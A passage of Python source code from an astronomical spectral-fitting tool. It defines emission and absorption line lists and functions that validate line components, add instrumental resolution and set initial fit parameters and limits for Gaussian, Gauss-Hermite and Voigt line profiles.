"NA_NI_10400" :{"center":10400.600, "amp":"free", "fwhm":"NA_NI_10410_FWHM" , "voff":"NA_NI_10410_VOFF" , "h3":"NA_NI_10410_H3" , "h4":"NA_NI_10410_H4", "line_type":"na", "label":r"[NI]"},
"NA_NI_10410" :{"center":10410.200, "amp":"free", "fwhm":"free" , "voff":"free" , "h3":"free" , "h4":"free" , "line_type":"na", "label":r"[NI]"},
"NA_FEXIII_10749" :{"center":10749.744, "amp":"free", "fwhm":"NA_FEXIII_10800_FWHM", "voff":"NA_FEXIII_10800_VOFF", "h3":"NA_FEXIII_10800_H3", "h4":"NA_FEXIII_10800_H4", "line_type":"na", "label":r"[FeXIII]"},
"NA_FEXIII_10800" :{"center":10800.858, "amp":"free", "fwhm":"free" , "voff":"free" , "h3":"free" , "h4":"free" , "line_type":"na", "label":r"[FeXIII]"},
"NA_HEI_10830" :{"center":10830.340, "amp":"free", "fwhm":"NA_HEI_10031_FWHM", "voff":"NA_HEI_10031_VOFF","h3":"NA_HEI_10031_H3", "h4":"NA_HEI_10031_H4", "line_type":"na", "label":r"He I"},
# "NA_PA_GAMMA" :{"center":10941.082, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na", "label":r"Pa$\gamma$"},
"NA_NIIII_11910" :{"center":11910.0, "amp":"free", "fwhm":"free", "voff":"free","h3":"free", "h4":"free", "line_type":"na", "label":r"[Ni II]"},
"NA_FEII_12570" :{"center":12570.0, "amp":"free", "fwhm":"free", "voff":"free","h3":"free", "h4":"free", "line_type":"na", "label":r"[Fe II]"},
"NA_FEII_13210" :{"center":13210.0, "amp":"free", "fwhm":"free", "voff":"free","h3":"free", "h4":"free", "line_type":"na", "label":r"[Fe II]"},
##############################################################################################################################################################################################################################################
}
# Default Broad lines
broad_lines = {
### Region 8 (< 2000 Å)
"BR_OVI_1034" :{"center":1033.820, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"O VI"},
"BR_LY_ALPHA" :{"center":1215.240, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"Ly$\alpha$"},
"BR_NV_1241" :{"center":1240.810, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"N V"},
"BR_OI_1305" :{"center":1305.530, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"O I"},
"BR_CII_1335" :{"center":1335.310, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"C II"},
"BR_SIIV_1398" :{"center":1397.610, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"Si IV + O IV"},
"BR_SIIV+OIV" :{"center":1399.800, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"Si IV + O IV"},
"BR_CIV_1549" :{"center":1549.480, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"C IV"},
"BR_HEII_1640" :{"center":1640.400, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"He II"},
"BR_CIII_1908" :{"center":1908.734, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"C III]"},
### Region 7 (2000 Å - 3500 Å)
"BR_CII_2326" :{"center":2326.000, "amp":"free", "fwhm":"free", "voff":"free", "line_profile":"G", "line_type":"br","label":r"C II]"},
"BR_FEIII_UV47":{"center":2418.000, "amp":"free", "fwhm":"free", "voff":"free", "line_profile":"G", "line_type":"br","label":r"Fe III"},
"BR_MGII_2799" :{"center":2799.117, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br","label":r"Mg II"},
### Region 6 (3500 Å - 4400 Å):
"BR_H_DELTA" :{"center":4102.900, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br"},
"BR_H_GAMMA" :{"center":4341.691, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br"},
### Region 5 (4400 Å - 5500 Å)
"BR_H_BETA" :{"center":4862.691, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br"},
### Region 3 (6200 Å - 6800 Å)
"BR_H_ALPHA" :{"center":6585.278, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"br"},
### Region Y (9000 Å - 12000 Å)
"BR_PA_EPSIL" :{"center":9548.587 ,"amp":"free", "fwhm":"free" , "voff":"free" , "shape":"free", "line_type":"br", "label":r"Pa$\epsilon$"},
"BR_PA_DELTA" :{"center":10052.123,"amp":"free", "fwhm":"free" , "voff":"free" , "shape":"free", "line_type":"br", "label":r"Pa$\delta$"},
"BR_PA_GAMMA" :{"center":10941.082,"amp":"free", "fwhm":"free" , "voff":"free" , "shape":"free" , "line_type":"br", "label":r"Pa$\gamma$"},
"BR_PA_BETA" :{"center":12820.0,"amp":"free", "fwhm":"free" , "voff":"free" , "shape":"free" , "line_type":"br", "label":r"Pa$\beta$"},
}
# Default Outlfow Lines
# Outflows share a universal width and voff across all lines, but amplitudes will be different.
# This is because outflows are (almost always) strongest in [OIII], and doesn't suffer from blending from
# neighboring lines or broad lines as the H-alpha/[NII]/[SII] lines do. The width and voff will be added when parameters are generated.
# For the H-beta/[OIII] region, [OIII]5007 dicates the amplitude of the outflow component (since parameters are flux-weighted, i.e., the strongest
# lines have more influence on the fit of a parameter than weaker ones), so the [OIII]4960 and H-beta outflow amplitudes are a fraction of the
# narrow-to-outflow line ratio. This same reasoning applies to the H-alpha/[NII]/[SII] region, with H-alpha deciding the line amplitudes.
outflow_lines = {
# Ne III
"OUT_NEIII_3869":{"center":3869.857, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"out"}, # Coronal Line
"OUT_NEIII_3968":{"center":3968.593, "amp":"OUT_NEIII_3869_AMP/NA_NEIII_3869_AMP*NA_NEIII_3968_AMP", "fwhm":"OUT_NEIII_3869_FWHM", "voff":"OUT_NEIII_3869_VOFF", "line_type":"out"}, # Coronal Line
# H-beta/[OIII]
"OUT_H_BETA" :{"center":4862.691, "amp":"OUT_OIII_5007_AMP/NA_OIII_5007_AMP*NA_H_BETA_AMP" , "fwhm":"OUT_OIII_5007_FWHM", "voff":"OUT_OIII_5007_VOFF", "line_type":"out"},
"OUT_OIII_4960" :{"center":4960.295, "amp":"OUT_OIII_5007_AMP/2.98" , "fwhm":"OUT_OIII_5007_FWHM", "voff":"OUT_OIII_5007_VOFF", "line_type":"out"},
"OUT_OIII_5007" :{"center":5008.240, "amp":"free" , "fwhm":"free", "voff":"free", "line_type":"out"},
# H-beta/[OIII] - Secondary Components
# "OUT_H_BETA_2" :{"center":4862.691, "amp":"OUT_OIII_5007_2_AMP/NA_OIII_5007_AMP*NA_H_BETA_AMP" , "fwhm":"OUT_OIII_5007_2_FWHM", "voff":"OUT_OIII_5007_2_VOFF", "line_type":"out"},
# "OUT_OIII_4960_2" :{"center":4960.295, "amp":"OUT_OIII_5007_2_AMP/2.98" , "fwhm":"OUT_OIII_5007_2_FWHM", "voff":"OUT_OIII_5007_2_VOFF", "line_type":"out"},
# "OUT_OIII_5007_2" :{"center":5008.240, "amp":"free" , "fwhm":"free", "voff":"free", "line_type":"out"},
# H-beta/[OIII] - Tertiary Components
# "OUT_H_BETA_3" :{"center":4862.691, "amp":"OUT_OIII_5007_3_AMP/NA_OIII_5007_AMP*NA_H_BETA_AMP" , "fwhm":"OUT_OIII_5007_3_FWHM", "voff":"OUT_OIII_5007_3_VOFF", "line_type":"out"},
# "OUT_OIII_4960_3" :{"center":4960.295, "amp":"OUT_OIII_5007_3_AMP/2.98" , "fwhm":"OUT_OIII_5007_3_FWHM", "voff":"OUT_OIII_5007_3_VOFF", "line_type":"out"},
# "OUT_OIII_5007_3" :{"center":5008.240, "amp":"free" , "fwhm":"free", "voff":"free", "line_type":"out"},
# [O I]
"OUT_OI_6302" :{"center":6302.046, "amp":"OUT_NII_6585_AMP/NA_NII_6585_AMP*NA_OI_6302_AMP", "fwhm":"OUT_NII_6585_FWHM", "voff":"OUT_NII_6585_VOFF", "line_type":"out"},
"OUT_OI_6365" :{"center":6365.535, "amp":"OUT_NII_6585_AMP/NA_NII_6585_AMP*NA_OI_6365_AMP", "fwhm":"OUT_NII_6585_FWHM", "voff":"OUT_NII_6585_VOFF", "line_type":"out"},
# H-alpha/[NII]/[SiII]
"OUT_NII_6549" :{"center":6549.859, "amp":"OUT_NII_6585_AMP/NA_NII_6585_AMP*NA_NII_6585_AMP/2.93", "fwhm":"OUT_NII_6585_FWHM", "voff":"OUT_NII_6585_VOFF", "line_type":"out"},
"OUT_H_ALPHA" :{"center":6564.632, "amp":"OUT_NII_6585_AMP/NA_NII_6585_AMP*NA_H_ALPHA_AMP" , "fwhm":"OUT_NII_6585_FWHM", "voff":"OUT_NII_6585_VOFF", "line_type":"out"},
"OUT_NII_6585" :{"center":6585.278, "amp":"free" , "fwhm":"free" , "voff":"free" , "line_type":"out"},
"OUT_SII_6718" :{"center":6718.294, "amp":"OUT_NII_6585_AMP/NA_NII_6585_AMP*NA_SII_6718_AMP" , "fwhm":"OUT_NII_6585_FWHM", "voff":"OUT_NII_6585_VOFF", "line_type":"out"},
"OUT_SII_6732" :{"center":6732.668, "amp":"OUT_NII_6585_AMP/NA_NII_6585_AMP*NA_SII_6732_AMP" , "fwhm":"OUT_NII_6585_FWHM", "voff":"OUT_NII_6585_VOFF", "line_type":"out"},
}
# Default Absorption Lines
absorp_lines = {
"ABS_NAI_5897":{"center":5897.558, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"abs","label":r"Na D"},
}
#
# Combine all line lists into single list
line_list = {**narrow_lines, **broad_lines, **outflow_lines, **absorp_lines}
return line_list
##################################################################################
#### Check Line Component Options ################################################
def check_line_comp_options(lam_gal,line_list,comp_options,edge_pad=10,verbose=True):
"""
Checks each entry in the complete (narrow, broad, outflow, absorption, and user) line list
and ensures all necessary keywords are input. It also checks every line entry against the
front-end component options (comp_options). The only required keyword for a line entry is
the "center" wavelength of the line. If "amp", "fwhm", "voff", "h3" and "h4" (for Gauss-Hermite)
line profiles are missing, it assumes these are all "free" parameters in the fitting of that line.
If "line_type" is not defined, it is assumed to be "na" (narrow). If "line_profile" is not defined,
it is assumed to be "G" (Gaussian).
"""
# Input checking
# If fit_narrow=False, set fit_outflow=False as well (doesn't make sense to fit outflows without their narrow lines)
if (comp_options["fit_narrow"]==False) and (comp_options["fit_outflow"]==True):
if verbose:
raise ValueError("\n Why would you fit outflows without narrow lines? Turn on narrow line component! \n")
# Step 1: Check each entry to make sure "center" keyword is defined.
for line in list(line_list):
if ("center" not in line_list[line]) or (not isinstance(line_list[line]["center"],(int,float))):
raise ValueError("\n Line list entry requires at least 'center' wavelength (in Angstroms) to be defined as in int or float type. \n ")
# Step 2: Remove lines that don't fall within the fitting region.
edge_pad = 10 # Angstroms; padding on each edge of the fitting region. If a line is within the number of Angstroms from the edge,
# it is not fit.
for line in list(line_list):
if ((lam_gal[0]+edge_pad)<=(line_list[line]["center"])<=(lam_gal[-1]-edge_pad)):
pass
else:
line_list.pop(line, None)
# Step 3: Remove any line_type based on comp_options:
# If fit_narrow=False, purge narrow lines from line_list
for line in list(line_list):
if (comp_options["fit_narrow"]==False) and ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="na"):
line_list.pop(line, None)
#
# If fit_broad=False, purge broad lines from line_list
for line in list(line_list):
if (comp_options["fit_broad"]==False) and ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="br"):
line_list.pop(line, None)
#
# If fit_outflow=False, purge outflow lines from line_list
for line in list(line_list):
if (comp_options["fit_outflow"]==False) and ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="out"):
line_list.pop(line, None)
#
# If fit_absorp=False, purge outflow lines from line_list
for line in list(line_list):
if (comp_options["fit_absorp"]==False) and ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="abs"):
line_list.pop(line, None)
#
# Step 4: Assign line_profile keyword; if line_profile is not defined, add a keyword for the line profile. If it
# is defined, make sure its consisten with the comp_options and line_type:
for line in list(line_list):
if ("line_type" in line_list[line]) and (line_list[line]["line_type"]=='na'):
line_list[line]["line_profile"] = comp_options["na_line_profile"]
if ("line_type" in line_list[line]) and (line_list[line]["line_type"]=='br'):
line_list[line]["line_profile"] = comp_options["br_line_profile"]
if ("line_type" in line_list[line]) and (line_list[line]["line_type"]=='out'):
line_list[line]["line_profile"] = comp_options["out_line_profile"]
if ("line_type" in line_list[line]) and (line_list[line]["line_type"]=='abs'):
line_list[line]["line_profile"] = comp_options["abs_line_profile"]
if (("line_type" not in line_list[line]) and ("line_profile" not in line_list[line])) or (("line_type" in line_list[line]) and (line_list[line]["line_type"]=="user") and ("line_profile" not in line_list[line])):
if verbose:
print("\n Warning: %s has no defined line_type or line_profile keywords. Assuming line_profile='G' (Gaussian).\n" % line)
line_list[line]["line_type"] = "user" # User-defined line
line_list[line]["line_profile"] = "G"
if ("line_type" not in line_list[line]) and ("line_profile" in line_list[line]):
line_list[line]["line_type"] = "user" # User-defined line
if ("line_type" in line_list[line]) and (line_list[line]["line_type"] not in ["na","br","out","abs","user"]):
raise ValueError("\n User-input line_type not recognized. Available options are 'na' (narrow), 'br' (broad), 'out' (outflow), or 'abs' (absorption). If unsure, leave out this keyword.\n ")
if ("line_profile" in line_list[line]) and (line_list[line]["line_profile"] not in ["G","L","GH","V"]):
raise ValueError("\n User-input line_profile not recognized. Available options are 'G' (Gaussian), 'L' (Lorentzian), 'GH' (Gauss-Hermite), or 'V' (Voigt). Default is 'G' (Gaussian).\n ")
#
# Step 5: Check parameters based on the defined line profile; if line_profile is not defined, add a keyword for the line profile. If it
# is defined, make sure its consisten with the comp_options and line_type:
for line in list(line_list):
if ("amp" not in line_list[line]): # Assume "free"
line_list[line]["amp"]="free"
if ("fwhm" not in line_list[line]): # Assume "free"
line_list[line]["fwhm"]="free"
if ("voff" not in line_list[line]): # Assume "free"
line_list[line]["voff"]="free"
if (line_list[line]["line_profile"]=="GH") and (comp_options["n_moments"]>2): # If Gauss-Hermite line profile
for m in range(3,3+(comp_options["n_moments"]-2),1):
if ("h"+str(m) not in line_list[line]): # Assume "free"
line_list[line]["h"+str(m)]="free"
if (line_list[line]["line_profile"]=='V'):
if ("shape" not in line_list[line]): # Assume "free"
line_list[line]["shape"]="free"
# Remove unnecessary parameters
# If the line profile is Gauss-Hermite, but the number of higher-order moments is
# less than or equal to 2 (for which the line profile is just Gaussian), remove any
# unnecessary higher-order line parameters that may be in the line dictionary.
if (line_list[line]["line_profile"]=="GH"):
for m in range(comp_options["n_moments"]+1,11,1):
if ("h"+str(m) in line_list[line]):
line_list[line].pop("h"+str(m),None) # Remove sigma key
if ("h"+str(m)+"_init" in line_list[line]):
line_list[line].pop("h"+str(m)+"_init",None) # Remove sigma key
if ("h"+str(m)+"_plim" in line_list[line]):
line_list[line].pop("h"+str(m)+"_plim",None) # Remove sigma key
# If line profile is not Gauss-Hermite, parse all higher-order moments and parameters
elif (line_list[line]["line_profile"]!="GH"):
for m in range(3,11,1):
if ("h"+str(m) in line_list[line]):
line_list[line].pop("h"+str(m),None) # Remove sigma key
if ("h"+str(m)+"_init" in line_list[line]):
line_list[line].pop("h"+str(m)+"_init",None) # Remove sigma key
if ("h"+str(m)+"_plim" in line_list[line]):
line_list[line].pop("h"+str(m)+"_plim",None) # Remove sigma key
# Parse unnecessary "shape" parameter is not Voigt profile
if (line_list[line]["line_profile"]!="V") and ("shape" in line_list[line]):
line_list[line].pop("shape",None) # Remove sigma key
if (line_list[line]["line_profile"]!="V") and ("shape_init" in line_list[line]):
line_list[line].pop("shape_init",None) # Remove sigma key
if (line_list[line]["line_profile"]!="V") and ("shape_plim" in line_list[line]):
line_list[line].pop("shape_plim",None) # Remove sigma key
#
# If tie_line_fwhm=True, tie line widths (narrow, broad, outflow, and absorption fwhm) are tied, respectively.
if comp_options["tie_line_fwhm"]:
for line in list(line_list):
# The universal narrow, broad, and outflow widths will be added when parameters are generated
# If h3,h4, or shape parameters are present, remove them
for m in range(3,3+(comp_options["n_moments"]-2),1):
if ("h"+str(m) in line_list[line]):
line_list[line].pop("h"+str(m),None)
if ("shape" in line_list[line]):
line_list[line].pop("shape",None)
# line_list[line].pop("sigma",None) # Removes the key completly
# line_list[line].pop("fwhm",None) # Removes the key completly
# Narrow lines
if ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="na"):
# line_list[line].pop("sigma",None) # Remove sigma key
line_list[line]["fwhm"] = "NA_FWHM" # Replace with fwhm key
# If line profile is Gauss-Hermite, add h3 and h4
if comp_options["na_line_profile"]=="GH":
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_list[line]["h"+str(m)] = "NA_H"+str(m)
if comp_options["na_line_profile"]=="V":
line_list[line]["shape"] = "NA_SHAPE"
# Broad lines
elif ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="br"):
line_list[line]["fwhm"] = "BR_FWHM"
if comp_options["br_line_profile"]=="GH":
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_list[line]["h"+str(m)] = "BR_H"+str(m)
if comp_options["br_line_profile"]=="V":
line_list[line]["shape"] = "BR_SHAPE"
# Outflow lines
elif ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="out"):
line_list[line]["fwhm"] = "OUT_FWHM"
if comp_options["out_line_profile"]=="GH":
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_list[line]["h"+str(m)] = "OUT_H"+str(m)
if comp_options["out_line_profile"]=="V":
line_list[line]["shape"] = "OUT_SHAPE"
# Absorption lines
elif ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="abs"):
line_list[line]["fwhm"] = "ABS_FWHM"
if comp_options["abs_line_profile"]=="GH":
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_list[line]["h"+str(m)] = "ABS_H"+str(m)
if comp_options["abs_line_profile"]=="V":
line_list[line]["shape"] = "ABS_SHAPE"
elif ("line_type" not in line_list[line]) or (line_list[line]["line_type"]=="user"):
if verbose:
print("\n Warning: %s has no line_type keyword specified. Assuming narrow line." % (line))
line_list[line]["fwhm"] = "NA_FWHM"
line_list[line]["line_type"] = "na"
if comp_options["na_line_profile"]=="GH":
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_list[line]["h"+str(m)] = "NA_H"+str(m)
if comp_options["na_line_profile"]=="V":
line_list[line]["shape"] = "NA_SHAPE"
#
# If tie_line_voff=True, tie line velocity offsets (narrow, broad, outflow, and absorption voff) are tied, respectively.
if comp_options["tie_line_voff"]:
for line in list(line_list):
# The universal narrow, broad, and outflow voff will be added when parameters are generated
# line_list[line].pop("voff",None) # Removes the key completly
if ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="na"): line_list[line]["voff"] = "NA_VOFF"
elif ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="br"): line_list[line]["voff"] = "BR_VOFF"
elif ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="out"): line_list[line]["voff"] = "OUT_VOFF"
elif ("line_type" in line_list[line]) and (line_list[line]["line_type"]=="abs"): line_list[line]["voff"] = "ABS_VOFF"
elif ("line_type" not in line_list[line]) or (line_list[line]["line_type"]=="user"):
if verbose:
print("\n Warning: %s has no line_type keyword specified. Assuming narrow line." % (line))
line_list[line]["voff"] = "NA_VOFF"
line_list[line]["line_type"] = "na"
#
# Do a final check for valid keywords. If any keywords don't belong, raise an error.
init_hmoments = ["h"+str(m)+"_init" for m in range(3,3+(comp_options["n_moments"]-2),1)]
plim_hmoments = ["h"+str(m)+"_plim" for m in range(3,3+(comp_options["n_moments"]-2),1)]
hmoments = ["h"+str(m) for m in range(3,3+(comp_options["n_moments"]-2),1)]
#
for line in list(line_list):
for key in line_list[line]:
if key not in ["center","center_pix","fwhm_res_kms","fwhm_res_ang","amp","fwhm","voff","shape","line_type","line_profile",
"amp_init","amp_plim","fwhm_init","fwhm_plim","voff_init","voff_plim",
"shape_init","shape_plim","label"]+hmoments+init_hmoments+plim_hmoments:
raise ValueError("\n %s not a valid keyword for the line list! \n" % key)
#
return line_list
##################################################################################
#### Add FWHM Resolution #########################################################
def add_fwhm_res(line_list,lam_gal,fwhm_gal,velscale,verbose=True):
# Perform linear interpolation on the fwhm_gal array as a function of wavelength
# We will use this to determine the fwhm resolution as a function of wavelenth for each
# emission line so we can correct for the resolution at every iteration.
fwhm_gal_ftn = interp1d(lam_gal,fwhm_gal,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
# Interpolation function that maps x (in angstroms) to pixels so we can get the exact
# location in pixel space of the emission line.
x_pix = np.array(range(len(lam_gal)))
pix_interp_ftn = interp1d(lam_gal,x_pix,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
# iterate through the line_list and add the keywords
for line in list(line_list):
center = line_list[line]["center"] # line center in Angstroms
center_pix = float(pix_interp_ftn(center)) # line center in pixels
line_list[line]["center_pix"] = center_pix
fwhm_res_ang = float(fwhm_gal_ftn(center)) # instrumental FWHM resolution in angstroms
line_list[line]["fwhm_res_ang"] = fwhm_res_ang
c = 299792.458 # speed of light (km/s)
fwhm_res_kms = (fwhm_res_ang/center)*c# instrumental FWHM resolution in km/s
line_list[line]["fwhm_res_kms"] = fwhm_res_kms
return line_list
##################################################################################
#### Initialize Line Parameters ##################################################
def initialize_line_pars(lam_gal,galaxy,comp_options,line_list,verbose=True):
# Smooth galaxy by a small amount to get rid of
# noise spike (for low S/N spectra)
# galaxy = gaussian_filter1d(galaxy,2.)
def get_init_amp(line_center):
line_center = float(line_center)
try:
return np.nanmax([np.nanmax(galaxy[(lam_gal>(line_center-10.)) & (lam_gal<(line_center+10.))]), 0.0])
except ValueError:
return 0.0
line_par_input = {}
# Initial conditions for some parameters
max_amp = np.nanmax(galaxy)
median_amp = np.nanmedian(galaxy)
opt_feii_amp_init = (0.1*np.nanmedian(galaxy))
uv_iron_amp_init = (0.1*np.nanmedian(galaxy))
balmer_amp_init = (0.1*np.nanmedian(galaxy))
# Defaut parameter limits for certain line types
# Pre-defined initial values and parameter limits for different line_types.
def amp_hyperpars(line_type,line_center): # amplitude hyperparameters
line_center = float(line_center)
line_window = 10.0 # sampling window for each line in Angstroms
if (line_type in ["na","user"]):
return get_init_amp(line_center), (0.0,max_amp)
elif (line_type in ["br","out"]):
return (get_init_amp(line_center))/2.0, (0.0,max_amp)
elif (line_type=="abs"):
return -median_amp, (-median_amp,0.0,)
#
def fwhm_hyperpars(line_type,line_center,line_profile): # FWHM hyperparameters
na_fwhm_init = 100.0
out_fwhm_init = 450.0
br_fwhm_init = 2500.0
abs_fwhm_init = 500.0
na_fwhm_lim = (0.1 , 800.0)
out_fwhm_lim = (0.1 , 5000.0)
br_fwhm_lim = (500.0, 15000.0)
abs_fwhm_lim = (0.1 , 800.0)
if line_type in ["na","user"]:
if (line_profile=="GH"):
# An exception is granted to line profiles that are Gauss-Hermite, since they need to be
# able to accomodate excess width from an outflow component.
return 250.0, (0.1,3000.0)
else:
return na_fwhm_init, na_fwhm_lim
elif line_type in ["br"]:
return br_fwhm_init, br_fwhm_lim
elif line_type in ["out"]:
return out_fwhm_init, out_fwhm_lim
elif line_type in ["abs"]:
if (line_profile=="GH"):
# An exception is granted to line profiles that are Gauss-Hermite, since they need to be
# able to accomodate excess width from an outflow component.
return 250.0, (0.1,5000.0)
else:
return abs_fwhm_init, abs_fwhm_lim
#
def voff_hyperpars(line_type, line_center):
na_voff_init, br_voff_init = 0.001, 0.001
na_voff_lim = (-1000,1000)
br_voff_lim = (-1000,1000)
if line_type in ["na","user"]:
return na_voff_init, na_voff_lim
elif line_type in ["br","abs","out"]:
return br_voff_init, br_voff_lim
def h_moment_hyperpars():
# Higher-order moments for Gauss-Hermite line profiles
# all start at the same initial value (0) and parameter limits [-0.5,0.5]
# You can specify individual higher-order parameters here.
h_init = 0.0
h_lim = (-0.5,0.5)
return h_init, h_lim
#
def shape_hyperpars(): # shape of the Voigt profile; if line_profile="V" (Voigt)
shape_init = 0.0
shape_lim = (0.0,1.0)
return shape_init, shape_lim
# We start with standard lines and options. These are added one-by-one. Then we check specific line options and then override any lines that have
# been already added. Params are added regardless of component options as long as the parameter is set to "free"
for line in list(line_list):
if (("amp" in line_list[line]) and (line_list[line]["amp"]=="free")):
amp_default = amp_hyperpars(line_list[line]["line_type"],line_list[line]["center"])
line_par_input[line+"_AMP"] = {"init": line_list[line].get("amp_init",amp_default[0]),
"plim":line_list[line].get("amp_plim",amp_default[1])}
# Check to make sure init value is within limits of plim
if (line_par_input[line+"_AMP"]["init"]<line_par_input[line+"_AMP"]["plim"][0]) or (line_par_input[line+"_AMP"]["init"]>line_par_input[line+"_AMP"]["plim"][1]):
raise ValueError("\n Amplitude (amp) initial value (amp_init) for %s outside of parameter limits (amp_plim)!\n" % (line))
if (("fwhm" in line_list[line]) and (line_list[line]["fwhm"]=="free")):
fwhm_default = fwhm_hyperpars(line_list[line]["line_type"],line_list[line]["center"],line_list[line]["line_profile"])
line_par_input[line+"_FWHM"] = {"init": line_list[line].get("fwhm_init",fwhm_default[0]),
"plim":line_list[line].get("fwhm_plim",fwhm_default[1])}
# Check to make sure init value is within limits of plim
if (line_par_input[line+"_FWHM"]["init"]<line_par_input[line+"_FWHM"]["plim"][0]) or (line_par_input[line+"_FWHM"]["init"]>line_par_input[line+"_FWHM"]["plim"][1]):
raise ValueError("\n FWHM (fwhm) initial value (fwhm_init) for %s outside of parameter limits (fwhm_plim)!\n" % (line))
if (("voff" in line_list[line]) and (line_list[line]["voff"]=="free")):
voff_default = voff_hyperpars(line_list[line]["line_type"],line_list[line]["center"])
line_par_input[line+"_VOFF"] = {"init": line_list[line].get("voff_init",voff_default[0]),
"plim":line_list[line].get("voff_plim",voff_default[1])}
# Check to make sure init value is within limits of plim
if (line_par_input[line+"_VOFF"]["init"]<line_par_input[line+"_VOFF"]["plim"][0]) or (line_par_input[line+"_VOFF"]["init"]>line_par_input[line+"_VOFF"]["plim"][1]):
raise ValueError("\n Velocity offset (voff) initial value (voff_init) for %s outside of parameter limits (voff_plim)!\n" % (line))
if (line_list[line]["line_profile"]=="GH") & (comp_options["n_moments"]>2):
h_default = h_moment_hyperpars()
for m in range(3,3+(comp_options["n_moments"]-2),1):
if ("h"+str(m) in line_list[line]):
if (line_list[line]["h"+str(m)]=="free"):
line_par_input[line+"_H"+str(m)] = {"init": line_list[line].get("h"+str(m)+"_init",h_default[0]),
"plim":line_list[line].get("h"+str(m)+"_plim",h_default[1])}
# Check to make sure init value is within limits of plim
if (line_par_input[line+"_H"+str(m)]["init"]<line_par_input[line+"_H"+str(m)]["plim"][0]) or (line_par_input[line+"_H"+str(m)]["init"]>line_par_input[line+"_H"+str(m)]["plim"][1]):
raise ValueError("\n Gauss-Hermite moment h%d initial value (h%d_init) for %s outside of parameter limits (h%d_plim)!\n" % (m,m,line,m))
if (("shape" in line_list[line]) and (line_list[line]["shape"]=="free")):
shape_default = shape_hyperpars()
line_par_input[line+"_SHAPE"] = {"init": line_list[line].get("shape_init",shape_default[0]),
"plim":line_list[line].get("shape_plim",shape_default[1])}
# Check to make sure init value is within limits of plim
if (line_par_input[line+"_SHAPE"]["init"]<line_par_input[line+"_SHAPE"]["plim"][0]) or (line_par_input[line+"_SHAPE"]["init"]>line_par_input[line+"_SHAPE"]["plim"][1]):
raise ValueError("\n Voigt profile shape parameter (shape) initial value (shape_init) for %s outside of parameter limits (shape_plim)!\n" % (line))
# If tie_line_fwhm = True, we tie all widths (including any higher order moments) by respective line groups (Na, Br, Out, Abs)
if (comp_options["tie_line_fwhm"]==True):
# Add the common line widths for na,br,out, and abs lines
if (comp_options["fit_narrow"]==True) or ("na" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["NA_FWHM"] = {"init": 250.0,
"plim":(0.0,1200.0)}
if (comp_options["na_line_profile"]=="GH") and (comp_options["n_moments"]>2):
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_par_input["NA_H"+str(m)] = {"init": 0.0,
"plim":(-0.5,0.5)}
if comp_options["na_line_profile"]=="V":
line_par_input["NA_SHAPE"] = {"init": 0.0,
"plim":(0.0,1.0)}
if (comp_options["fit_broad"]==True) or ("br" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["BR_FWHM"] = {"init": 2500.0,
"plim":(500.0,15000.0)}
if (comp_options["br_line_profile"]=="GH") and (comp_options["n_moments"]>2):
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_par_input["BR_H"+str(m)] = {"init": 0.0,
"plim":(-0.5,0.5)}
if comp_options["br_line_profile"]=="V":
line_par_input["BR_SHAPE"] = {"init": 0.0,
"plim":(0.0,1.0)}
if (comp_options["fit_outflow"]==True) or ("out" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["OUT_FWHM"] = {"init": 450.0,
"plim":(0.1,2500.0)}
if (comp_options["abs_line_profile"]=="GH") and (comp_options["n_moments"]>2):
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_par_input["ABS_H"+str(m)] = {"init": 0.0,
"plim":(-0.5,0.5)}
if comp_options["abs_line_profile"]=="V":
line_par_input["ABS_SHAPE"] = {"init": 0.0,
"plim":(0.0,1.0)}
if (comp_options["fit_absorp"]==True) or ("abs" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["ABS_FWHM"] = {"init": 100.0,
"plim":(0.0,800.0)}
if (comp_options["abs_line_profile"]=="GH") and (comp_options["n_moments"]>2):
for m in range(3,3+(comp_options["n_moments"]-2),1):
line_par_input["ABS_H"+str(m)] = {"init": 0.0,
"plim":(-0.5,0.5)}
if comp_options["abs_line_profile"]=="V":
line_par_input["ABS_SHAPE"] = {"init": 0.0,
"plim":(0.0,1.0)}
# If tie_line_voff = True, we tie all velocity offsets (including any higher order moments) by respective line groups (Na, Br, Out, Abs)
if comp_options["tie_line_voff"]==True:
# Add the common line voffs for na,br,out, and abs lines
